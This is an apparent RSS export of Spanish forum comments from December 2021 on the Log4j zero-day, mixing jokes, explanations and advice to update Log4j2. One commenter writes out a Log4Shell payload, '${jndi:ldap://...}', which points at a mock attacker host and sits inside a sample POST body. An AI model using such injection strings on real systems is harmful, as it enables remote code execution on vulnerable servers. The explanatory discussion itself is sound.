		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c059#c-59</link>
		<pubDate>Sat, 11 Dec 2021 02:48:12 +0000</pubDate>
		<dc:creator>Razhan</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c059#c-59</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-18" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c018#c-18" rel="nofollow">#18</a> No voy a mentar el nivel de dolor</p><p>&#187;&nbsp;autor: <strong>Razhan</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34520954</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>58</meneame:order>
		<meneame:user>EmuAGR</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>20</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#58 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c058#c-58</link>
		<pubDate>Sat, 11 Dec 2021 02:34:48 +0000</pubDate>
		<dc:creator>EmuAGR</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c058#c-58</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-51" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c051#c-51" rel="nofollow">#51</a> Ahora a ver quién ha sido el genio de meter todas esas tontopolladas a log4j.</p><p>&#187;&nbsp;autor: <strong>EmuAGR</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34520951</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>57</meneame:order>
		<meneame:user>EmuAGR</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>22</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#57 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c057#c-57</link>
		<pubDate>Sat, 11 Dec 2021 02:28:37 +0000</pubDate>
		<dc:creator>EmuAGR</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c057#c-57</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-26" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c026#c-26" rel="nofollow">#26</a> Anda que ejecutar código que le pasan por LDAP... Cuánta chorrada meten en ciertas librerías. Es como si alguna agencia de inteligencia hubiera tenido la idea de contribuir alguna estupidez.</p><p>&#187;&nbsp;autor: <strong>EmuAGR</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34520947</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>56</meneame:order>
		<meneame:user>alvdavi</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>6</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#56 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c056#c-56</link>
		<pubDate>Sat, 11 Dec 2021 02:20:01 +0000</pubDate>
		<dc:creator>alvdavi</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c056#c-56</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-55" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c055#c-55" rel="nofollow">#55</a> No recomendaria a nadie intentar determinar si estas afectado o no por este problema analizando el comportamiento de tu aplicacion y lo que intenta guardar en los logs. Personalmente recomendaria aquellos utilizando log4j2 que asuman que estan afectados y actualizen</p><p>&#187;&nbsp;autor: <strong>alvdavi</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34520941</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>55</meneame:order>
		<meneame:user>--94561--</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>20</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#55 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c055#c-55</link>
		<pubDate>Sat, 11 Dec 2021 02:10:42 +0000</pubDate>
		<dc:creator>--94561--</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c055#c-55</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-54" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c054#c-54" rel="nofollow">#54</a> Que la movida es que te pueden mandar una peticion en la que figure ese texto asi formado, no? <br />
<br />
&#34;${jndi:ldap://jaja.equisde.tevoyapetarelkakas.com/miraquerisas}&#34;<br />
<br />
Para que el jodio log4j se lo coma <img data-src="https://cdn.mnmstatic.net/v_149/img/menemojis/36/lol.gif" alt="xD" title=":lol: xD" width="18" height="18" src="https://cdn.mnmstatic.net/v_149/img/g.gif" class="emoji lazy" /><br />
<br />
Ejemplo:<br />
<br />
POST <a href="http://mipagina.com/user" title="mipagina.com/user" rel="nofollow">mipagina.com/user</a><br />
<br />
A la que se le pasa de body<br />
<br />
{ &#34;user&#34;: &#34;${jndi:ldap://jaja.equisde.tevoyapetarelkakas.com/miraquerisas}&#34;, email=&#34;ostiatu@tetemail.com&#34;}<br />
<br />
Y como se te ocurra logear el user estas jodido....<br />
<br />
BOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOM</p><p>&#187;&nbsp;autor: <strong>--94561--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34520937</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>54</meneame:order>
		<meneame:user>alvdavi</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>6</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#54 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c054#c-54</link>
		<pubDate>Sat, 11 Dec 2021 02:04:48 +0000</pubDate>
		<dc:creator>alvdavi</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c054#c-54</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-35" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c035#c-35" rel="nofollow">#35</a> No es necesaria ninguna accion especialmente extraña con Log4j2 para estar afectado por este problema. Si utilizas log4j2, asume que estas afectado por este problema (porque casi seguro, lo estas). La unica opcion es actualizar log4j2 a 2.15+</p><p>&#187;&nbsp;autor: <strong>alvdavi</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34520935</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>53</meneame:order>
		<meneame:user>alvdavi</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>6</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#53 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c053#c-53</link>
		<pubDate>Sat, 11 Dec 2021 02:02:01 +0000</pubDate>
		<dc:creator>alvdavi</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c053#c-53</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-46" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c046#c-46" rel="nofollow">#46</a> Hola,<br />
<br />
Tu mensaje no es correcto. El fallo de log4j2 es critico, y en muchas ocasiones puede utilizarse independientemente de la version de OpenJDK en la que esta corriendo log4j2. La unica opción segura es actualizar Log4j2</p><p>&#187;&nbsp;autor: <strong>alvdavi</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34520929</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>52</meneame:order>
		<meneame:user>alvdavi</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>10</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#52 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c052#c-52</link>
		<pubDate>Sat, 11 Dec 2021 01:58:31 +0000</pubDate>
		<dc:creator>alvdavi</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c052#c-52</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-25" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c025#c-25" rel="nofollow">#25</a> Correcto. Esta vulnerabilidad debe seguir considerandose critica y requiere una actualizacion de Log4j2.</p><p>&#187;&nbsp;autor: <strong>alvdavi</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34520928</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>51</meneame:order>
		<meneame:user>--94561--</meneame:user>
		<meneame:votes>2</meneame:votes>
		<meneame:karma>23</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#51 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c051#c-51</link>
		<pubDate>Sat, 11 Dec 2021 01:58:12 +0000</pubDate>
		<dc:creator>--94561--</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c051#c-51</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-49" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c049#c-49" rel="nofollow">#49</a> <a class="tooltip c:3594248-39" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c039#c-39" rel="nofollow">#39</a> vale, espera!!!!<br />
<br />
Que no que no!!!!!<br />
<br />
Que es que el mismo atacante te manda la cadena de texto (pongamos en el username cuando alguien va a loguearse o darse de alta en la applicacion, por ejemplo) &#34;${jndi:ldap://dasdafdafs}&#34; y coge el tontopollas del log4j y se pone a llamar a la pagina y a deserializar la respuesta y le enchufan una class que explota la vulnerabilidad mitica del deserializado y puede ejecutar lo que quiera con permisos de quien haya lanzado el servidor....<br />
<br />
LOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOL<br />
<br />
Como pueden hacer un CAGADON de ese tamaño en una puta libreria que SOLO TIENE QUE LOGUEAR, JODER <img data-src="https://cdn.mnmstatic.net/v_149/img/menemojis/36/lol.gif" alt="xD" title=":lol: xD" width="18" height="18" src="https://cdn.mnmstatic.net/v_149/img/g.gif" class="emoji lazy" /></p><p>&#187;&nbsp;autor: <strong>--94561--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34520926</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>50</meneame:order>
		<meneame:user>alvdavi</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>20</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#50 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c050#c-50</link>
		<pubDate>Sat, 11 Dec 2021 01:56:58 +0000</pubDate>
		<dc:creator>alvdavi</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c050#c-50</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-17" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c017#c-17" rel="nofollow">#17</a> El uso de una version mas nueva de OpenJDK (ya sea en referencia a jdk8u121, jdk8u191 o 11.0.1) provee unicamente de una mitigacion parcial del problema. En muchas circunstancias, sigue siendo posible explotar la vulnerabilidad utilizando otras alternativas.<br />
<br />
Esta vulnerabilidad debe considerarse critica independientemente de que version de OpenJDK se esta utilizando. La unica opcion para evitar el problema es actualizar Log4j2 a la ultiva version de 2.15 disponible (2.15rc2 en el momento de escribir este mensaje)</p><p>&#187;&nbsp;autor: <strong>alvdavi</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34520918</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>49</meneame:order>
		<meneame:user>--94561--</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>10</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#49 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c049#c-49</link>
		<pubDate>Sat, 11 Dec 2021 01:50:05 +0000</pubDate>
		<dc:creator>--94561--</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c049#c-49</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-39" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c039#c-39" rel="nofollow">#39</a> A ver, que creo que estoy perdiendome algo, por que sino no seria tan grave:<br />
<br />
Generalmente guardaras la respuesta en algun sitio porque la querras para algo mas que logearla, no se la das directamente a un log, y el problema solo ocurre cuando el deserializado lo hace log4j2, no?<br />
<br />
Y cuando la recojas para hacer algo con ella la desearilazas a un objeto (de la clase que sea) y ya no lo tendra que hacer log4j2, no? Le daras ese objeto ya parseado a log4j....<br />
<br />
Insisto, creo que lo he entendido mal, pero no se QUE he entendido mal.</p><p>&#187;&nbsp;autor: <strong>--94561--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34520895</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>48</meneame:order>
		<meneame:user>la_gusa</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>14</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#48 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c048#c-48</link>
		<pubDate>Sat, 11 Dec 2021 01:30:29 +0000</pubDate>
		<dc:creator>la_gusa</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c048#c-48</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-42" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c042#c-42" rel="nofollow">#42</a> la inyección de clases en tiempo de ejecución es más viejo que el cagar y funciona de puta madre. Es lo que hizo Spring tan popular</p><p>&#187;&nbsp;autor: <strong>la_gusa</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34520409</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>47</meneame:order>
		<meneame:user>herlocksholmes</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>13</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#47 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c047#c-47</link>
		<pubDate>Fri, 10 Dec 2021 23:07:33 +0000</pubDate>
		<dc:creator>herlocksholmes</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c047#c-47</guid>
		<description><![CDATA[<p>No entiendo nada de lo que habláis. <br />
Os odio a todos <img data-src="https://cdn.mnmstatic.net/v_149/img/menemojis/36/lol.gif" alt="xD" title=":lol: xD" width="18" height="18" src="https://cdn.mnmstatic.net/v_149/img/g.gif" class="emoji lazy" /> <img data-src="https://cdn.mnmstatic.net/v_149/img/menemojis/36/lol.gif" alt="xD" title=":lol: xD" width="18" height="18" src="https://cdn.mnmstatic.net/v_149/img/g.gif" class="emoji lazy" /> <img data-src="https://cdn.mnmstatic.net/v_149/img/menemojis/36/lol.gif" alt="xD" title=":lol: xD" width="18" height="18" src="https://cdn.mnmstatic.net/v_149/img/g.gif" class="emoji lazy" /></p><p>&#187;&nbsp;autor: <strong>herlocksholmes</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34520387</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>46</meneame:order>
		<meneame:user>respira</meneame:user>
		<meneame:votes>2</meneame:votes>
		<meneame:karma>7</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#46 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c046#c-46</link>
		<pubDate>Fri, 10 Dec 2021 23:01:31 +0000</pubDate>
		<dc:creator>respira</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c046#c-46</guid>
		<description><![CDATA[<p>A ver, que si, que es un 0day y la cosa es grave... Pero esta noticia es bastante alarmista. Si usas una java6 medianamente actualizada no estas afectado por la vulnerabilidad &#34;J A V A 6&#34;... Esto significa que tan solo las personas que usen una versión de antes de 2004 o no hayan actualizado están jodidas. Y obviamente NO es fácil de explotar.<br />
<br />
Vamos que log4j tiene un fallo muy grave y sin embargo java lo cubre bastante bien para que explotarla sea bastante más difícil de lo que ya es...<br />
<br />
¿Esto es el salvame delux de la programación?</p><p>&#187;&nbsp;autor: <strong>respira</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34520359</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>45</meneame:order>
		<meneame:user>raul_lapeira</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>12</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#45 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c045#c-45</link>
		<pubDate>Fri, 10 Dec 2021 22:53:27 +0000</pubDate>
		<dc:creator>raul_lapeira</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c045#c-45</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-31" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c031#c-31" rel="nofollow">#31</a> ... coño y que llevo haciendo 20 años! <img data-src="https://cdn.mnmstatic.net/v_149/img/menemojis/36/lol.gif" alt="xD" title=":lol: xD" width="18" height="18" src="https://cdn.mnmstatic.net/v_149/img/g.gif" class="emoji lazy" />. Servidores con Java.</p><p>&#187;&nbsp;autor: <strong>raul_lapeira</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34520352</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>44</meneame:order>
		<meneame:user>raul_lapeira</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>9</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#44 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c044#c-44</link>
		<pubDate>Fri, 10 Dec 2021 22:52:11 +0000</pubDate>
		<dc:creator>raul_lapeira</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c044#c-44</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-38" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c038#c-38" rel="nofollow">#38</a> Tienes que tener acceso al JDNI que tiene la clase que quiere hacer pupa... para los usuarios de windows en local sí es un problema, pero en la mayoria de redes corporativas que se me ocurren no seria viable este tipo de ataque segun está hecho en la POC.</p><p>&#187;&nbsp;autor: <strong>raul_lapeira</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34520344</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>43</meneame:order>
		<meneame:user>raul_lapeira</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>9</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#43 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c043#c-43</link>
		<pubDate>Fri, 10 Dec 2021 22:50:10 +0000</pubDate>
		<dc:creator>raul_lapeira</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c043#c-43</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-42" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c042#c-42" rel="nofollow">#42</a> Pero tios... tambien tienes que secuestrar un JNDI accesible para la JVM donde corra la app donde inyectas la cadena... esto no es tan noticiable ni de lejos, cosas peores tuvieron mucha menos prensa.</p><p>&#187;&nbsp;autor: <strong>raul_lapeira</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34520243</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>42</meneame:order>
		<meneame:user>raul_lapeira</meneame:user>
		<meneame:votes>2</meneame:votes>
		<meneame:karma>22</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#42 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c042#c-42</link>
		<pubDate>Fri, 10 Dec 2021 22:29:32 +0000</pubDate>
		<dc:creator>raul_lapeira</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c042#c-42</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-3" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c03#c-3" rel="nofollow">#3</a> hombre... Esta haciendo un jndi a traves de un logging... Wtf xxdd. Hay que mirar el codigo fuente de esto... Muy legendario.<br />
<br />
Todo el tema de la inyeccion de clases en tiempo de ejecucion que suena muy hipster no deja de ser una gilipollez en sistemas corporativos tipicos.<br />
<br />
Vivimos la era del fashion oriented programming y vaya si se nota.</p><p>&#187;&nbsp;autor: <strong>raul_lapeira</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34520215</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>41</meneame:order>
		<meneame:user>--419859--</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>25</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#41 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c041#c-41</link>
		<pubDate>Fri, 10 Dec 2021 22:25:31 +0000</pubDate>
		<dc:creator>--419859--</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c041#c-41</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-13" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c013#c-13" rel="nofollow">#13</a> ¿Y cual propones?, ¿dejar de usar módulos de terceros y hacerlo todo desde 0?, ¿mini aplicaciones gestionadas por &#34;equipos&#34; de dos personas? Me imagino que el log de lo que haces va a la consola, y con suerte a un fichero, a base de &#34;print&#34; o equivalente en tu código. Super granular, escalable y nada complicado de usar cuando tienes unos cuantos cientos de miles de líneas de código.</p><p>&#187;&nbsp;autor: <strong>--419859--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34520200</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>40</meneame:order>
		<meneame:user>--419859--</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>14</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#40 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c040#c-40</link>
		<pubDate>Fri, 10 Dec 2021 22:20:48 +0000</pubDate>
		<dc:creator>--419859--</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c040#c-40</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-19" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c019#c-19" rel="nofollow">#19</a> Pon un proxy en lugar de parchear, verás que divertido ...</p><p>&#187;&nbsp;autor: <strong>--419859--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34520154</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>39</meneame:order>
		<meneame:user>drnth</meneame:user>
		<meneame:votes>2</meneame:votes>
		<meneame:karma>22</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#39 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c039#c-39</link>
		<pubDate>Fri, 10 Dec 2021 22:06:01 +0000</pubDate>
		<dc:creator>drnth</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c039#c-39</guid>
